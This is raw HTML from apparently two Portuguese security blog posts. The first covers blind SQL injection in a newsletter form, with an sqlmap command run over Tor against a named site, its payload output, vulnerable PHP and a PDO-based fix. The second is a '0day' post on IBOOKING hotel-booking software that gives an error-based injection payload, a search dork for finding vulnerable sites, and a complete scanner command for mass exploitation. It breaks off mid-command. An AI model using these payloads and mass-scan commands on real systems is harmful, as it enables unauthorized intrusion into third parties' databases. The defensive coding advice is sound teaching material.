<span style="font-family: Courier New, Courier, monospace;">http://www.vul.com.br/newsletter_done.php?nome=bypass<b>+{SQL_INJECTION_BLIND}</b>&email=bypass@aduneb.com.br<b>+{SQL_INJECTION_BLIND}</b>&Submit3=cadastrar</span><br />
<br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">GERANDO ERRO PASSANDO CARACTERES MALICIOSOS</span></b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZiCpS0sv_q-paU2i7ChBkGwtDarwo9aJh1ANU7_uPsAXy4uPJtHW1zrx8Wxnf6NK8rnhhvgXlLuPbUO-Xsde4o-QzlbeURPfFj0wY05wj4tSe0BdatqdzYSvfS9zFoYTOfTQN3hGT5g9q/s1600/Captura+de+tela+de+2015-09-28+17%253A16%253A17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="GERANDO ERRO PASSANDO CARACTERES MALICIOSOS" border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZiCpS0sv_q-paU2i7ChBkGwtDarwo9aJh1ANU7_uPsAXy4uPJtHW1zrx8Wxnf6NK8rnhhvgXlLuPbUO-Xsde4o-QzlbeURPfFj0wY05wj4tSe0BdatqdzYSvfS9zFoYTOfTQN3hGT5g9q/s640/Captura+de+tela+de+2015-09-28+17%253A16%253A17.png" title="GERANDO ERRO PASSANDO CARACTERES MALICIOSOS" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>ERRO EXPOSTO:</b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6jhVYsKcbiRh6N1_5sBfdWieSKpobfgcrVYYV3tqD9ijJpT6YBf7b77tc1c1fkH0-KpjdVIZmC7QEt76FFt8e1kUY0QElXk6Jb6GvsnH7X4hDLhov2J04-5Em62ky4rNg2pImDzhVy5e3/s1600/Captura+de+tela+de+2015-09-28+17%253A16%253A50.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="ERRO EXPOSTO:" border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6jhVYsKcbiRh6N1_5sBfdWieSKpobfgcrVYYV3tqD9ijJpT6YBf7b77tc1c1fkH0-KpjdVIZmC7QEt76FFt8e1kUY0QElXk6Jb6GvsnH7X4hDLhov2J04-5Em62ky4rNg2pImDzhVy5e3/s640/Captura+de+tela+de+2015-09-28+17%253A16%253A50.png" title="ERRO EXPOSTO:" width="640" /></a></div>
<br />
Pelos campos passados podemos perceber que tais parâmetros fazem parte da newsletter do "CMS", mas manipulando tais valores, saindo da validação javascript podemos bypassar.<br />
<b>Dica:</b> <i>sempre validar dados no lado servidor, seja ele vindo de clientes logados ou não.</i><br />
<i>Se o request é feito pelo usurário, não confie no Request filtre.</i><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>EXPLORAÇÃO VIA SQLMAP:</b></span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>COMANDO:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">sqlmap -u 'http://www.vull.com.br/newsletter_done.php' --data "nome=bypass&email=123#2*@aduneb.com.br#1*&Submit3=cadastrar" -p nome --random-agent --level 3 --risk 2 --tor --tor-type=SOCKS5 --dbs --thread 5</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">PRINT:</span></b><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhob_CQqgnUuXHoNof7vwMpdeEJ9gwZ0KaaU3Nk3wNm9-cGURqLz__A2G4P1jY21V9vCEko4hhVtFDJaLfYkAJNOhCp1_ua7gBQ9H8NuqzJvtGxrjV-aeJ1QuuAakxT6KmWGPTvSFjRuxd/s1600/Captura+de+tela+de+2015-09-28+17%253A29%253A08.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="PRINT EXPLORAÇÃO VIA SQLMAP:" border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhob_CQqgnUuXHoNof7vwMpdeEJ9gwZ0KaaU3Nk3wNm9-cGURqLz__A2G4P1jY21V9vCEko4hhVtFDJaLfYkAJNOhCp1_ua7gBQ9H8NuqzJvtGxrjV-aeJ1QuuAakxT6KmWGPTvSFjRuxd/s640/Captura+de+tela+de+2015-09-28+17%253A29%253A08.png" title="PRINT EXPLORAÇÃO VIA SQLMAP:" width="640" /></a></div>
<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>RETURN SQLMAP DEBUG PAYLOAD:</b></span><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Parameter: #1* ((custom) POST)</span></b><br />
<span style="font-family: Courier New, Courier, monospace;"> <b>Type: boolean-based blind</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Payload: nome=bypass&email=-7840') OR 1946=1946#@aduneb.com.br#1&Submit3=cadastrar</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"> <b>Type: AND/OR time-based blind</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Payload: nome=bypass&email=123#2') AND (SELECT * FROM (SELECT(SLEEP(10)))Vxmq)#@aduneb.com.br#1&Submit3=cadastrar</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Parameter: #2* ((custom) POST)</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> <b>Type: boolean-based blind</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Payload: nome=bypass&email=-1051') OR 5045=5045#&Submit3=cadastrar</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"> <b>Type: AND/OR time-based blind</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Payload: nome=bypass&email=123#2@aduneb.com.br#1') AND (SELECT * FROM (SELECT(SLEEP(10)))tdlq)#&Submit3=cadastrar</span><br />
<br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">CÓDIGO:</span></b><br />
Um exemplo de como pode está o código do arquivo <span style="font-family: 'Courier New', Courier, monospace;"><b>newsletter_done.php</b></span><br />
<br />
<pre><?php</pre>
<pre></pre>
<pre>$servername = "localhost";
$username = "username";
$password = "password";
$dbname = "myDB";</pre>
<pre></pre>
<pre></pre>
<pre></pre>
<pre>$nome = $_POST['nome'];
$email = $_POST['email'];</pre>
<pre></pre>
<pre></pre>
<pre><i>// Create connection</i>
$conn = new mysqli($servername, $username, $password, $dbname);</pre>
<pre><i>// Check connection</i>
if ($conn->connect_error) {
die("Connection failed: " . $conn->connect_error);
}
$sql = "INSERT INTO newsletter (nome, email)
VALUES ('{$nome}', '{$email}')";</pre>
<pre>if ($conn->query($sql) === TRUE) {
echo "EMAIL CADASTRADO COM SUCESSO!";
} else {
echo "Error: " . $sql . "<br>" . $conn->error;
}
$conn->close();
</pre>
<div>
<br /></div>
<pre>?>
</pre>
<br />
Sem nem um tipo de filtro no request POST os valores são setados direto nas variáveis da aplicação.<br />
<br />
<div style="text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: large;"><b>NÃO FAÇA ISSO NUNCA!</b></span></div>
<div style="text-align: center;">
<img src="http://i.giphy.com/Pe5919oNgXol2.gif" height="320" width="304" /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: left;">
</div>
<ol>
<li><b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">USE PDO!</span></b></li>
<li><b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">PDO É VIDA CARA!</span></b></li>
<li><b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">USE FILTROS!</span></b></li>
<li><b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">ISSO SALVA VIDAS!</span></b></li>
</ol>
<br />
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Um simples exemplo usando PDO e filtros:</div>
<div style="text-align: left;">
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">CÓDIGO:</span></b></div>
<div style="text-align: left;">
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span></b></div>
<pre><?php</pre>
<pre></pre>
<pre>$servername = "localhost";
$username = "username";
$password = "password";
$dbname = "myDB";</pre>
<pre></pre>
<pre></pre>
<pre><i>// VALIDANDO $_POST SE CAMPOS EXISTEM</i></pre>
<pre>$nome = is_set($_POST['nome']) ? $_POST['nome'] : exit('<p>FALTA campo nome!</p>');</pre>
<pre></pre>
<pre>$email = is_set($_POST['email']) ? $_POST['email'] : exit('<p>FALTA campo email!</p>');</pre>
<pre></pre>
<pre></pre>
<pre><i>// FILTRANDO CAMPOS POST</i></pre>
<pre>$nome = is_name($nome) ? $nome : exit('<p>NOME invalido!</p>');</pre>
<pre>$email = is_email($email) ? $email : exit('<p>Email invalido!</p>');</pre>
<pre></pre>
<pre>// INICIANDO CONEXÃO</pre>
<pre></pre>
<pre></pre>
<pre></pre>
<pre>try {
$dbh = new PDO("mysql:host={$servername};dbname={$dbname}",$username,$password);</pre>
<pre> </pre>
<pre></pre>
<pre>$stmt=$dbh->prepare("INSERT INTO newsletter (nome, email) VALUES (:nome, :email)");</pre>
<pre>$stmt->bindParam(':nome' , $nome);
$stmt->bindParam(':email', $email);
$stmt->execute();
</pre>
<div>
<br /></div>
<pre>$dbh = null;</pre>
<pre>} catch (PDOException $e) {
print "<p>Error!: SQL/INSERT - 0001</p>";
die();
}</pre>
<pre><i>// REF CÓDIGO: </i></pre>
<pre><i>// <a href="http://php.net/manual/pt_BR/pdo.prepared-statements.php">http://php.net/manual/pt_BR/pdo.prepared-statements.php</a></i></pre>
<pre><i>// <a href="http://php.net/manual/en/pdo.prepare.php">http://php.net/manual/en/pdo.prepare.php</a></i></pre>
<pre><i>
</i></pre>
<pre></pre>
<pre></pre>
<pre><i>//FUNCTION VALIDANDO SE VALORES PASSADOS EXISTEM</i></pre>
<pre>function is_set($value) {
return isset($value) && !empty($value) ? TRUE : FALSE;
}</pre>
<pre><i>// REF CÓDIGO:</i></pre>
<pre><i>// <a href="http://php.net/manual/en/function.isset.php" target="_blank">http://php.net/manual/en/function.isset.php</a></i></pre>
<pre><i>// <a href="http://php.net/manual/en/function.empty.php" target="_blank">http://php.net/manual/en/function.empty.php</a>
</i></pre>
<pre><i>
</i></pre>
<pre></pre>
<pre><i>// FUNCTION FILTRANDO CARACTERES E VALIDANDO SE É EMAIL</i></pre>
<pre>function is_email($email){
<i>// Remove all illegal characters from email</i>
$email = filter_var($email, FILTER_SANITIZE_EMAIL);
<i>// Validate e-mail</i>
return (!filter_var($email, FILTER_VALIDATE_EMAIL) === false) ? true : false;</pre>
<pre>}</pre>
<pre>// REF CÓDIGO: </pre>
<pre>// <a href="http://php.net/manual/en/filter.filters.sanitize.php%C2%A0" target="_blank">http://php.net/manual/en/filter.filters.sanitize.php </a></pre>
<pre>// <a href="http://www.w3schools.com/php/filter_validate_email.asp">http://www.w3schools.com/php/filter_validate_email.asp</a></pre>
<pre>// <a href="http://bobby-tables.com/php.html" target="_blank">http://bobby-tables.com/php.html </a></pre>
<pre> </pre>
<pre></pre>
<pre><i>// FUNCTION FILTRANDO E VALIDANDO NOME
// MODELO PARANOICO</i></pre>
<pre>function is_name($name) { </pre>
<pre> </pre>
<pre></pre>
<pre><i>// FILTRO POSSÍVEIS CARACTERES DE INJEÇÃO </i>
foreach (array('0X', 'DROP', ';','--','UNION','CONCAT(','TABLE_','INFORMATION_',"'",'"') as $value) {
$name = !strstr(strtoupper($name), $value) ? $name : FALSE;
</pre>
<pre>}</pre>
<pre><i>// </i><i>FILTRO POSSÍVEIS CARACTERES DE INJEÇÃO + HTML</i><b> </b>
$name = (filter_var(stripslashes(strip_tags(trim($name))), FILTER_SANITIZE_STRING));
return $name;
}</pre>
<pre></pre>
<pre> </pre>
<pre>?></pre>
<br />
<br />
É um pequeno código simples com mais segurança, seguindo as seguintes dicas:<br />
<br />
<br />
<ul>
<li>VALIDAR EXISTÊNCIA DO REQUEST</li>
<li>FILTRAR CAMPOS</li>
<li>USAR PDO EM TODA E QUALQUER SELECT,UPDATE,DELETE,INSERT</li>
<li>- SE POSSÍVEL </li>
<li> VALIDAR O TIPO DE VARIÁVEL<br /> VALIDAR TAMANHO MAXIMO CAMPOS / INPUT HTML<br /> VALIDAR TAMANHO MAXIMO CAMPOS / INPUT JAVASCRIPT</li>
<li>ANTES DE GERAR O REQUEST DESNECESSÁRIO AO SERVIDOR</li>
<li>REGRA PRINCIPAL NÃO CONFIE NO CLIENTE.</li>
</ul>
<br />
<br />
<ul>
<li>ÚLTIMA REGRA<br />SIGA TODAS REGRAS ACIMA.</li>
</ul>
<br />
<br />
<br />InurlBRhttp://www.blogger.com/profile/12688503833321390298noreply@blogger.com4tag:blogger.com,1999:blog-5670232360751087799.post-28802685662055755122015-09-15T21:57:00.000-03:002015-10-14T11:56:49.003-03:00( 0day ) IBOOKING CMS - INJEÇÃO DE SQL e Exploração em massa<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYYwSbP0g4Hm-QCm_PwlExOmxNOGBRg84M8G_b_V8Qg2jjHTctku5FMJTQ2TRfq3EZUY0aaIqYTyDNHnZtisWiJZ79L8zIJTMPxZ_N7AGvlG0zud3VYO10bliTigp5x_RoYWcjA8XvQpVV/s1600/Captura+de+tela+de+2015-09-15+20%253A28%253A03.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYYwSbP0g4Hm-QCm_PwlExOmxNOGBRg84M8G_b_V8Qg2jjHTctku5FMJTQ2TRfq3EZUY0aaIqYTyDNHnZtisWiJZ79L8zIJTMPxZ_N7AGvlG0zud3VYO10bliTigp5x_RoYWcjA8XvQpVV/s640/Captura+de+tela+de+2015-09-15+20%253A28%253A03.png" width="640" /></a></div>
<b><br /></b>
<b><br /></b>
<b>IBOOKING <a href="http://blog.inurl.com.br/search/label/cms" target="_blank">CMS</a></b> é um sistema voltado pro ramo de hotelaria, gerenciamento de reservas.<br />
Como próprio site do desenvolvedor diz:<br />
<br />
<blockquote class="tr_bq">
<i><b>Motor de Reservas:</b> Com o nosso motor de reservas você pode vender as diárias do seu hotel diretamente no seu site e sem precisar pagar comissão. Uma forma eficaz de ampliar sua lucratividade e interagir com o cliente desde o momento da compra.</i></blockquote>
<br />
Tal sistema tem uma falha grave de <a href="http://blog.inurl.com.br/search/label/sqli" target="_blank">Injeção SQL</a>, explorada via request <b>GET</b> no parâmetro <span style="font-family: monospace; white-space: pre-wrap;"><b>idPousada</b> do arquivo </span><span style="font-family: monospace;"><b style="white-space: pre-wrap;">filtro_faixa_etaria.php</b><span style="white-space: pre-wrap;"> dentro da pasta ou URL dinâmica</span> <b style="white-space: pre-wrap;">/</b></span><span style="font-family: monospace; white-space: pre-wrap;"><b>motor-de-reservas/</b>.
</span><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; white-space: pre-wrap;"><b>INFORMAÇÕES:</b></span><span style="font-family: monospace;"> </span><br />
<br />
<span style="font-family: Courier New, Courier, monospace; white-space: pre-wrap;">[+] FORNECEDOR: WWW.<b>ibooking.com.br</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="white-space: pre-wrap;">[+</span><span style="white-space: pre-wrap;">] </span><span style="white-space: pre-wrap;">VERSÕES VULNERÁVEIS: <b>TODAS</b>
</span><span style="white-space: pre-wrap;">[+</span><span style="white-space: pre-wrap;">] </span><span style="white-space: pre-wrap;">ARQUIVO: </span><b style="white-space: pre-wrap;">filtro_faixa_etaria.php</b><span style="white-space: pre-wrap;">
</span><span style="white-space: pre-wrap;">[+</span><span style="white-space: pre-wrap;">] </span><span style="white-space: pre-wrap;">PASTA OU URL DINÂMICA: </span><span style="white-space: pre-wrap;"><b>/</b></span><span style="white-space: pre-wrap;"><b>motor-de-reservas</b>
</span><span style="white-space: pre-wrap;">[+</span><span style="white-space: pre-wrap;">] </span><span style="white-space: pre-wrap;">PARÂMETRO: </span><span style="white-space: pre-wrap;"><b>idPousada<i>(GET)</i></b></span></span><br />
<span style="white-space: pre-wrap;"><span style="font-family: Courier New, Courier, monospace;">[+] DORK: <b>intext:"Desenvolvido por ibooking"</b></span></span><span style="white-space: pre-wrap;"><span style="font-family: monospace;">
</span><span style="font-family: Courier New, Courier, monospace;">[+] REPORTADO: <b>15/10/2015</b></span></span><span style="font-family: monospace; white-space: pre-wrap;">
</span><br />
<span style="font-family: monospace; white-space: pre-wrap;"><br /></span>
<span style="font-family: monospace;"><span style="white-space: pre-wrap;">A request vulneravel é feito através de uma function javascript encontrada dentro de </span></span><span style="font-family: 'Courier New', Courier, monospace; white-space: pre-wrap;"><b>/</b></span><span style="font-family: 'Courier New', Courier, monospace; white-space: pre-wrap;"><b>motor-de-reservas</b></span><br />
<span style="font-family: 'Courier New', Courier, monospace; white-space: pre-wrap;"><b><br /></b></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b><span style="white-space: pre-wrap;">Código</span><span style="white-space: pre-wrap;">:</span></b></span><span style="font-family: monospace; white-space: pre-wrap;">
</span>
<br />
<pre><span style="font-family: Courier New, Courier, monospace;">jQuery(function($){
$("#quartos").change(function() {
var qtde_quartos = $(this).val();
$.ajax({
type: "GET",
url: "filtro_faixa_etaria.php",
data: "qtde_quartos="+qtde_quartos+"&idPousada=61",
success: function(xml){
$("#filtro_faixa_etaria").html(xml);
}
});
});
$.ajax({
type: "GET",
url: "filtro_faixa_etaria.php",
data: "qtde_quartos=1&idPousada=61",
success: function(xml){
$("#filtro_faixa_etaria").html(xml);
}
});
});</span>
</pre>
<span style="white-space: pre-wrap;"><span style="font-family: monospace;"><br /></span></span>
<span style="font-family: monospace; white-space: pre-wrap;">
</span><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b><span style="white-space: pre-wrap;">URL Vulnerável:</span></b></span><br />
<span style="font-family: monospace; white-space: pre-wrap;"><br /></span>
<span style="white-space: pre-wrap;"><span style="font-family: Courier New, Courier, monospace;">http://www.TARGET.br<b>/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61</b></span></span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>POC:</b></span><br />
<br />
<span style="font-family: 'Courier New', Courier, monospace; white-space: pre-wrap;">http://www.TARGET.br</span><b style="font-family: 'Courier New', Courier, monospace; white-space: pre-wrap;">/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61<span style="color: red;">+(INJEÇÃO_SQL)</span>
Exemplo:</b><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">http://www.TARGET.br<b>/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61<span style="color: red;">+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)</span></b></span><br />
<br />
Detalhes na injeção SQL é usado FUNCTIONS básicas de injeção, mas seu diferencial é uso de variáveis Globais do MySQL.<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">@@GLOBAL.version = VERSÃO BANCO DE DADOS MYSQL</span><br />
<span style="font-family: Courier New, Courier, monospace;">@@GLOBAL.version_compile_os = SERVIDOR COMPILADO</span><br />
<span style="font-family: Courier New, Courier, monospace;">@@GLOBAL.version_compile_machine = TIPO DE ARQUITETURA DO SERVIDOR</span><br />
<br />
Também passo a string <b><span style="font-family: Courier New, Courier, monospace;">::INURLBR_VULN::</span></b> no formato hexadecimal, para assim posteriormente validar se a injeção ocorreu como esperado.<br />
<span style="font-family: Courier New, Courier, monospace;">0x203a3a494e55524c42525f56554c4e3a3a20 = <b>::INURLBR_VULN::</b></span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Print saída da injeção:</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEBv3k1rCAeJPTwoT72VqecNUzqqSKMBDhkRA2z0npazMQyp339HZFRAecMPI4MWekYHqOf6TtAVekDkQj1-DqSiX8MpHIIpcmpWKIhSbbyn9An21KyjYmsW7FlTHQKagw0CVnkgCrNCje/s1600/Captura+de+tela+de+2015-09-15+18%253A42%253A51.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Detalhes na injeção SQL é usado FUNCTIONS básicas de injeção, mas seu diferencial é uso de variáveis Globais do MySQL. @@GLOBAL.version = VERSÃO BANCO DE DADOS MYSQL @@GLOBAL.version_compile_os = SERVIDOR COMPILADO @@GLOBAL.version_compile_machine = TIPO DE ARQUITETURA DO SERVIDOR Também passo a string ::INURLBR_VULN:: no formato hexadecimal, para assim posteriormente validar se a injeção ocorreu como esperado. 0x203a3a494e55524c42525f56554c4e3a3a20 = ::INURLBR_VULN:: Print saída da injeção:" border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEBv3k1rCAeJPTwoT72VqecNUzqqSKMBDhkRA2z0npazMQyp339HZFRAecMPI4MWekYHqOf6TtAVekDkQj1-DqSiX8MpHIIpcmpWKIhSbbyn9An21KyjYmsW7FlTHQKagw0CVnkgCrNCje/s640/Captura+de+tela+de+2015-09-15+18%253A42%253A51.png" title="Detalhes na injeção SQL é usado FUNCTIONS básicas de injeção, mas seu diferencial é uso de variáveis Globais do MySQL. @@GLOBAL.version = VERSÃO BANCO DE DADOS MYSQL @@GLOBAL.version_compile_os = SERVIDOR COMPILADO @@GLOBAL.version_compile_machine = TIPO DE ARQUITETURA DO SERVIDOR Também passo a string ::INURLBR_VULN:: no formato hexadecimal, para assim posteriormente validar se a injeção ocorreu como esperado. 0x203a3a494e55524c42525f56554c4e3a3a20 = ::INURLBR_VULN:: Print saída da injeção:" width="640" /></a></div>
<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Exploração em massa usando scanner INURLBR</b></span><br />
Baixar: <a href="https://github.com/googleinurl/SCANNER-INURLBR" target="_blank">https://github.com/googleinurl/SCANNER-INURLBR</a><br />
<br />
Montando comando:<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SETANDO DORK DE PESQUISA</b></span><br />
<i>--dork 'YOU_DORK'</i><br />
- <b>USE</b> <span style="color: red; font-family: Courier New, Courier, monospace;">--dork 'intext:"Desenvolvido por ibooking"'</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SETANDO ARQUIVO DE SAÍDA:</b></span><br />
- <b>USE</b>: <span style="color: red; font-family: Courier New, Courier, monospace;">-s 'ibooking.txt'</span><br />
<br />
<b style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;">SETANDO STRING EXPLOIT GET</b><br />
<i>--exploit-get 'EXPLOIT_GET'</i><br />
<b>- USE</b>: <span style="color: red; font-family: Courier New, Courier, monospace;">--exploit-get '/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)'</span><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SETANDO TIPO DE VALIDAÇÃO: </span></b><br />
- <b>USE</b>: <span style="color: red; font-family: Courier New, Courier, monospace;">-t 3 </span><br />
<i>3 O terceiro tipo tenta válido o erro definido por: -a 'VALUE_INSIDE_THE _target " mais as validações padrões do scanner, o diferencial é que </i><i> --exploit-get é injetado direto na url:</i><br />
<i>Exemplo: --exploit-get '/index.php?id=1&file=conect.php'</i>INJEÇÃO URL: http://www.target.br<i>/index.php?id=1&file=conect.php</i><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SETANDO STRING DE VALIDAÇÃO:</b></span><br />
<i>Especifique a string que será usada como validação no script:</i><br />
<i>Exemplo: -a {string}</i><br />
<i>Usando: -a '<title>hello world</title>'</i><br />
<i>Se o valor específico é encontrado no alvo, ele é considerado vulnerável.</i><br />
- <b>USE</b>: <span style="color: red; font-family: Courier New, Courier, monospace;"> <b>-a</b> 'INURLBR_VULN'</span><br />
<i>O valor <span style="color: red; font-family: 'Courier New', Courier, monospace;">INURLBR_VULN </span>é passado no formato hexadecimal na string <b>exploit-get</b></i><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">COMANDO COMPLETO:</span></b><br />
<br />
<span style="color: red; font-family: 'Courier New', Courier, monospace;">php inurlbr.php <b>--dork</b> <b>'</b>intext:"Desenvolvido por ibooking"<b>'</b> </span><span style="color: red; font-family: 'Courier New', Courier, monospace;"><b>-s '</b>ibooking.txt<b>'</b> </span><span style="color: red; font-family: 'Courier New', Courier, monospace;"><b>--exploit-get '</b>/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)<b>'</b> </span><span style="color: red; font-family: 'Courier New', Courier, monospace;"><b>-t</b> 3 </span><b style="color: red; font-family: 'Courier New', Courier, monospace;">-a</b><span style="color: red; font-family: 'Courier New', Courier, monospace;"> </span><span style="color: red; font-family: 'Courier New', Courier, monospace;"><b>'</b>INURLBR_VULN<b>'</b></span><br />
<div>
<span style="color: red; font-family: 'Courier New', Courier, monospace;"><br /></span></div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Print saída:</b></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVniL6cbLqdDGqR9jT2xSogV5atT0EjCScarp_hO0mZec93-dWrjxaQzDXemZtOlJYfspseUQiKoGDaYDEpb_XteoEx9hZK319XJABAsWhOXjbFHMnnBgnE593VXgqSNCOgmgId7TfJSLV/s1600/Captura+de+tela+de+2015-09-15+20%253A11%253A32.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Montando comando: SETANDO DORK DE PESQUISA --dork 'YOU_DORK' - USE --dork 'intext:"Desenvolvido por ibooking"' SETANDO ARQUIVO DE SAÍDA: - USE: -s 'ibooking.txt' SETANDO STRING EXPLOIT GET --exploit-get 'EXPLOIT_GET' - USE: --exploit-get '/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)' SETANDO TIPO DE VALIDAÇÃO: - USE: -t 3 3 O segundo tipo tenta válido o erro definido por: -a 'VALUE_INSIDE_THE _target " o parametro get setando no comando --exploit-get é injetado direto na url: Exemplo: --exploit-get '/index.php?id=1&file=conect.php' INJEÇÃO URL: http://www.target.br/index.php?id=1&file=conect.php SETANDO STRING DE VALIDAÇÃO: Especifique a string que será usada como validação no script: Exemplo: -a {string} Usando: -a '<title>hello world</title>' Se o valor específico é encontrado no alvo, ele é considerado vulnerável. - USE: -a 'INURLBR_VULN' COMANDO COMPLETO: php inurlbr.php --dork 'intext:"Desenvolvido por ibooking"' -s 'ibooking.txt' --exploit-get 